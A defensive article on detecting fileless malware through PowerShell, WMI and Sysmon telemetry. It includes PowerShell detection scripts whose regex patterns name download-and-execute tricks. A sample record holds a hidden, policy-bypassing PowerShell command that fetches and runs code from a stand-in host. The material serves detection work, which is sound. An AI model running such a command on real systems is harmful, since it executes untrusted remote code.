- Fileless malware operates in memory by abusing legitimate processes such as PowerShell and WMI.
- Effective detection is based on behavior, telemetry, and endpoint analytics.
- PowerShell logs, Sysmon logs, and WMI reviews are key to finding persistence.
- Layered defense, MITRE ATT&CK mapping and EDR/XDR drastically reduce risk.
The threat landscape has taken a qualitative leap with malware that lives exclusively in memory. This type of attack, better known as fileless malware, does not write executables to disk and abuses legitimate system tools, which makes it extremely difficult to detect with traditional signature-based antivirus software; hence the importance of knowing how to detect and remove suspicious files or malware.
What matters is not just its stealth, but the way it relies on trusted processes (PowerShell, WMI, mshta, rundll32, among others) and “living off the land” techniques to camouflage itself. Consequently, detection means observing behavior, correlating events, and monitoring memory, not searching for suspicious files in storage.
What is fileless malware and why does it matter?

Any attack considered fileless executes malicious code without leaving persistent artifacts on disk (or minimizing them as much as possible), relying on binaries already present on the system. It often injects or launches its payload directly into RAM, executing inside normal operating system processes, which is why monitoring RAM in real time is key.
This approach evades controls that depend on file inspection, from executable whitelists to reputation analysis. Although some attacks manage to be 100% fileless, it is more common for them to combine file-based and fileless phases during the intrusion cycle.
A common characteristic is that the adversary uses command lines and scripting to orchestrate each phase. Since there is no obvious “anomalous file”, signature-based engines have a harder time raising alerts, especially if the activity falls within “normal” parameters for administrative tools.
It is important to keep in mind that, by design, many of these implants have limited persistence: as soon as the system restarts, the payload in RAM disappears. However, attackers often introduce re-entry or lightweight persistence mechanisms so that access is restored without intervention.
Why is it so difficult to detect?
The first reason is obvious: there is no file to scan. If code lives and dies in memory, disk-centric engines have little to offer unless process, memory, and network telemetry complement them.
The second reason is the abuse of native, signed system processes (PowerShell, WMI, mshta, rundll32, VBScript, JScript, batch interpreters, .NET, etc.). This coexistence with the “legitimate” reduces noise and makes it hard to distinguish good from bad without behavioral analysis or tools such as Process Hacker.
The third reason is that static signatures don't work well with payloads that are assembled at runtime, obfuscated, or unpacked into memory. In fact, many antivirus programs don't thoroughly inspect real-time in-memory execution.
Furthermore, the rise of targeted campaigns (APTs) and the use of advanced tactics have raised the bar. We have seen attacks that operate in the kernel or through webshells with minimal forensic trace, further hindering the response if there are not sufficient logs and traceability.
How a fileless attack enters and operates
Initial access is usually achieved using classic techniques: phishing with links or attachments, Office documents with macros or DDE, PDF documents with malicious JavaScript, exploitation of vulnerabilities (including exploit kits), or stolen credentials.
Following the intrusion, an execution chain is triggered that invokes tools such as PowerShell or WMI to download, decrypt, or inject the payload directly into the process's memory. All of this is orchestrated with commands and scripts that, by themselves, may seem like routine administrative operations.
In many campaigns, the attacker seeks to persist for as long as necessary. To maintain a backdoor without writing visible executables, scheduled tasks, Registry keys, or, especially, WMI event subscriptions are used to reactivate execution on a specific trigger (e.g., system startup or user login).
If the target rarely restarts, a critical server for example, the in-memory presence is particularly advantageous because it lengthens the adversary's window of opportunity without the need for noisy persistence.
Techniques, variations and real cases
The “living off the land” philosophy summarizes the approach: the intruder makes use of binaries and functionality already present in Windows to move, collect, and execute. This reduces the need to drop tools on disk and minimizes exposure.
Popular techniques include injection into existing processes, the use of mshta or rundll32 to load code, VBScript/JScript and batch execution, and the presence of suspicious DLLs. Also seen are payloads embedded in documents that exploit vulnerabilities to gain execution without writing persistent executables.
There are variants such as fileless ransomware, which prepares its execution in memory and encrypts data before defenses detect it; another variant abuses the Windows Registry to host encrypted configurations or payloads, initializing execution with self-deleting keys.
Notable examples have been documented: webshells like Godzilla that receive modules via HTTP and inject them into memory; the SMB backdoor Exploit.DoublePulsar, capable of loading code directly from the network by exploiting SMB 1.0 vulnerabilities; or APT29 (The Dukes) campaigns like Operation Ghost, with fileless backdoors like RegDuke and POSHSPY.
Persistence: WMI, Registry, and Tasks
To avoid losing access, many attackers configure WMI subscriptions combining event filters and consumers (CommandLineEventConsumer) that launch PowerShell or other actions when a condition is met (e.g., system uptime).
Others choose to create discreet scheduled tasks or modify the Registry at startup locations. Although the fileless ideal avoids writing to disk, these minimal “crumbs” often appear when durability or re-entry is desired.
On the other hand, these techniques leave identifiable artifacts if properly audited: WMI repositories, task definitions, modified Registry keys. Hence the importance of having audit and telemetry policies in place from the very beginning.
It's important to remember that RAM is volatile. Therefore, without persistence, a reboot can evict the implant, but don't be overconfident: an attacker with access can re-seed it using the same technique as soon as the right opportunity appears.
Corporate risk and why blocking "all at once" is not the answer
Blindly blocking essential tools like PowerShell can harm IT operations, and even then it's not enough: there are ways to circumvent the execution policy, load PowerShell via DLL, repurpose scripts, or package them into other executables to evade basic controls.
The same goes for Office macros. Although it is advisable to disable them by policy when the business allows it, detecting them through signatures or static heuristics is complex and prone to false positives when there is previously unseen or obfuscated code.
Purely server-side or cloud-side detection, without prevention at the endpoint, leads to latency and connectivity dependence; to contain it in time, the endpoint agent must be able to make local decisions with the full context of the system.
Ultimately, the problem is one of visibility and context: we need to understand which process called which, with what arguments, what keys or tasks it created, what connections it opened, and how the chain of events evolves over time.
Evolution and figures: an upward trend
Fileless campaigns have been growing for years. Some industry reports pointed at the time to a 94% increase in fileless attacks in a half-year, with PowerShell usage peaks doubling in a matter of weeks (from 2.5 to 5.2 attacks per 1,000 endpoints), a clear reminder that these tactics are a favorite of attackers.
This surge is explained by the combination of offensive maturity, signature coverage failures, the popularity of targeted attacks, and the ease of camouflaging oneself within trusted processes without raising immediate suspicion.
How to really detect fileless malware
The key is to move from identifying “who you are” (file) to observing “what you are doing” (behavior). Real-time endpoint monitoring (memory, process tree, command line, Registry, network activity) allows recognition of malicious patterns common to a wide variety of families.
Modern EDR/XDR solutions and AI engines with behavioral indicators detect suspicious sequences such as an Office document launching hidden PowerShell with no profile, or an in-memory download followed by injection into another process and then encryption or exfiltration.
Additionally, it is crucial to enable and centralize PowerShell logs (v5+ improves traceability), enable Sysmon to enrich events, and monitor the WMI repository for unusual subscriptions, consumers, and bindings.
Network analysis adds another layer: inspection of traffic behaviors (C2, exfiltration patterns), prevention of network attacks, and correlation with endpoint events. When malware touches the kernel or navigates protected memory, the network can provide clues that the host doesn't see.
Practical guide to prevention and hunting
Restrict the use of PowerShell and WMI to administrators and clear business cases, with AppLocker/WDAC or well-defined and inventoried execution policies. It's not about simply prohibiting, but about regulating, logging, and alerting on deviations.
Disable and control macros via Group Policy in Office whenever feasible, and enforce Protected View and digital signatures on templates. Educate users to recognize phishing emails and malicious links, as social engineering remains the preferred entry point.
Apply system and application security patches, prioritizing exposed components (browsers, plugins, Office, .NET, SMB services). Monitor vulnerabilities and reduce the attack surface (disabling SMBv1, for example, if not essential).
Enhance telemetry: enable advanced PowerShell logging, Sysmon with a fine-tuned rule set, auditing of the Registry and scheduled tasks, and periodic WMI queries (e.g., checking __EventFilter, __EventConsumer and __FilterToConsumerBinding against a known baseline).
Deploy solutions with memory scanning and behavioral analysis capable of detecting payloads injected into live processes, and evaluate EDR/XDR for continuous threat hunting, process containment, change rollback and device isolation when necessary.
Tactical mapping and response
Working with the MITRE ATT&CK framework helps identify relevant tactics/techniques: execution (T1059), PowerShell (T1059.001), WMI (T1047), process injection (T1055), persistence via Registry (T1112) or scheduled tasks (T1053), exfiltration (T1041), among others.
In a typical incident, it is important to reconstruct the complete “story”: what attachment the user opened, which process launched which, with what arguments, what artifacts were created, and how the chain propagated. Correlating the entire context is key to isolating the root cause and avoiding cutting where it shouldn't be cut.
Some vendors have introduced concepts such as “Storyline” to group related processes and correctly attribute the source of the threat. This approach allows mitigation of the entire malicious group, reversal of actions (keys, files, connections), and a clean endpoint without disrupting legitimate processes such as the email client.
The response must be local and fast: if the agent already has the user, process, Registry, network and file context, it can block, roll back, and isolate without waiting for decisions from the cloud, which is critical against workloads that only live in memory for seconds.
Examples of detection and signals to monitor
Look for PowerShell invocations with ExecutionPolicy Bypass, a hidden window, no profile, and in-memory downloads followed by Start-Process or injection. These are common patterns in attacks originating from documents with macros or DDE.
In WMI, check the root\subscription namespace to locate event filters, command-line consumers, and bindings that are not in the baseline. You can even create “defensive” subscriptions that alert you to new suspicious objects.
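The baseline check described here and in the telemetry step above, as an added PowerShell example that is not code from the original article: it inventories __EventFilter, __EventConsumer and __FilterToConsumerBinding objects, writes a baseline on the first run, and warns on anything that later differs. The baseline file path is an assumption.

```powershell
# Added example (not code from the original article): inventory the WMI
# persistence classes in root\subscription and diff them against a saved baseline.
# The baseline path is an assumption; pick any location you control.
$BaselinePath = 'C:\Baselines\wmi-subscriptions.json'
$Namespace    = 'root\subscription'

function Get-WmiSubscriptionInventory {
    $items = @()
    foreach ($f in Get-CimInstance -Namespace $Namespace -ClassName __EventFilter) {
        $items += [pscustomobject]@{ Kind = 'Filter'; Name = $f.Name; Detail = $f.Query }
    }
    # Enumerating the abstract __EventConsumer also returns the concrete
    # consumers (CommandLineEventConsumer, ActiveScriptEventConsumer, ...).
    foreach ($c in Get-CimInstance -Namespace $Namespace -ClassName __EventConsumer) {
        $kind   = $c.CimClass.CimClassName
        $detail = switch ($kind) {
            'CommandLineEventConsumer'  { $c.CommandLineTemplate }
            'ActiveScriptEventConsumer' { $c.ScriptText }
            default                     { '' }
        }
        $items += [pscustomobject]@{ Kind = $kind; Name = $c.Name; Detail = $detail }
    }
    foreach ($b in Get-CimInstance -Namespace $Namespace -ClassName __FilterToConsumerBinding) {
        # Filter and Consumer are references to the instances above; their Name keys identify the pair.
        $items += [pscustomobject]@{ Kind = 'Binding'; Name = "$($b.Filter.Name) -> $($b.Consumer.Name)"; Detail = '' }
    }
    return $items
}

function Get-ItemKey($i) { "$($i.Kind)|$($i.Name)|$($i.Detail)" }

function Compare-WmiSubscriptionBaseline {
    param([string]$Path = $BaselinePath)
    $current = @(Get-WmiSubscriptionInventory)
    if (-not (Test-Path $Path)) {
        # First run on a known-clean host: record the baseline and stop.
        ConvertTo-Json -InputObject $current | Set-Content -Path $Path
        Write-Output "Baseline written to $Path ($($current.Count) objects)"
        return
    }
    # Parenthesised so the parsed array is enumerated on both Windows PowerShell and PowerShell 7.
    $known = @((Get-Content -Path $Path -Raw | ConvertFrom-Json) | ForEach-Object { Get-ItemKey $_ })
    foreach ($item in $current) {
        $key = Get-ItemKey $item
        if ($known -notcontains $key) { Write-Warning "Not in baseline: $key" }
    }
}

Compare-WmiSubscriptionBaseline
```

Run it once on a host you trust to record the baseline, then on a schedule; a warning naming a CommandLineEventConsumer or ActiveScriptEventConsumer you did not create is the signal to investigate.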
In the Registry, keep an eye on logon and startup keys and common persistence locations, and cross-reference them with process telemetry. With Sysmon, watch for process creation with anomalous children (Office → PowerShell → cmd → rundll32, etc.).
On the network, identify outbound connections to unusual domains or paths, encrypted payloads or incremental exfiltration, and relate PowerShell/WMI activity to spikes in outbound communications.
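The PowerShell invocation patterns and the Office → PowerShell parent/child chain described in the two paragraphs above, as an added PowerShell example that is not from the original article: it scores a process-creation record by those indicators and reads live Sysmon Event ID 1 records with Get-WinEvent. The process-name lists, the two-indicator threshold and the sample record are constructed assumptions.

```powershell
# Added example (not code from the original article): score Sysmon process
# creation events (Event ID 1) for the invocation patterns described above.
# The parent/host lists, threshold and sample record are constructed for illustration.
$OfficeParents = 'WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE'
$ScriptHosts   = 'powershell.exe', 'pwsh.exe', 'mshta.exe', 'rundll32.exe', 'wscript.exe', 'cscript.exe'

function Get-FilelessIndicators {
    param([string]$Image, [string]$ParentImage, [string]$CommandLine)
    $hits   = @()
    $img    = "$([IO.Path]::GetFileName($Image))".ToLower()
    $parent = "$([IO.Path]::GetFileName($ParentImage))".ToUpper()
    # An Office document spawning a script host is the classic macro/DDE chain.
    if ($OfficeParents -contains $parent -and $ScriptHosts -contains $img) { $hits += "office-parent:$parent->$img" }
    if ($CommandLine -match '(?i)-(ep|executionpolicy)\s+bypass') { $hits += 'executionpolicy-bypass' }
    if ($CommandLine -match '(?i)-w(indowstyle)?\s+hidden')       { $hits += 'hidden-window' }
    if ($CommandLine -match '(?i)-nop(rofile)?\b')                { $hits += 'no-profile' }
    # -e / -enc / -EncodedCommand followed by a long base64 token.
    if ($CommandLine -match '(?i)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}') { $hits += 'encoded-command' }
    # Download or decode straight into memory, typically chained with IEX/Start-Process.
    if ($CommandLine -match '(?i)DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|Invoke-Expression|FromBase64String') { $hits += 'download-or-decode' }
    return $hits
}

function Find-SuspiciousProcessCreations {
    param([int]$MaxEvents = 5000, [int]$MinIndicators = 2)
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents | ForEach-Object {
        # Sysmon stores its fields as <Data Name="...">value</Data> elements.
        $d = @{}
        foreach ($n in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        $hits = @(Get-FilelessIndicators -Image $d.Image -ParentImage $d.ParentImage -CommandLine $d.CommandLine)
        if ($hits.Count -ge $MinIndicators) {
            [pscustomobject]@{ Time = $_.TimeCreated; Parent = $d.ParentImage; Image = $d.Image
                               Indicators = ($hits -join ', '); CommandLine = $d.CommandLine }
        }
    }
}

# Constructed sample record (not a real capture) so the scoring can be tried offline.
$sample = @{
    Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
    ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
    CommandLine = 'powershell.exe -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/a'')"'
}
Get-FilelessIndicators @sample   # five indicators for this record
```

Call Find-SuspiciousProcessCreations on a host with Sysmon installed to list recent events that match two or more indicators; raise MinIndicators if your administrators legitimately use some of these switches.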
Market services and capabilities
There are managed services such as EMDR (Enterprise Managed Detection and Response) that combine proactive detection based on MITRE ATT&CK with real-time response, and a 24/7 SOC to monitor, analyze behavior and perform forensics when needed.
At the product level, solutions with behavioral detection on the endpoint itself are especially effective against fileless attacks because they do not depend on the vector (exploit, macro, PowerShell, PowerSploit, exploit kit or even zero-day vulnerabilities) and can automatically reverse actions.
Beyond marketing, the critical thing is that the agent has all the local context (users, processes, arguments, Registry, files and communications) to make decisions without delays, mitigate, isolate and allow continued work on a clean device.
Historically, campaigns like WannaCry illustrate the usefulness of this approach: detection and containment by behavior even before signatures existed, which significantly reduced the impact on protected organizations.
Detecting fileless malware requires looking where the action actually occurs: memory, the command line, processes, and their relationship over time. With good logging policies, PowerShell and WMI monitoring, endpoint behavior controls, layered defense, and ATT&CK mapping, it is perfectly achievable to strip the stealth from a threat that, by its nature, prefers to go unnoticed.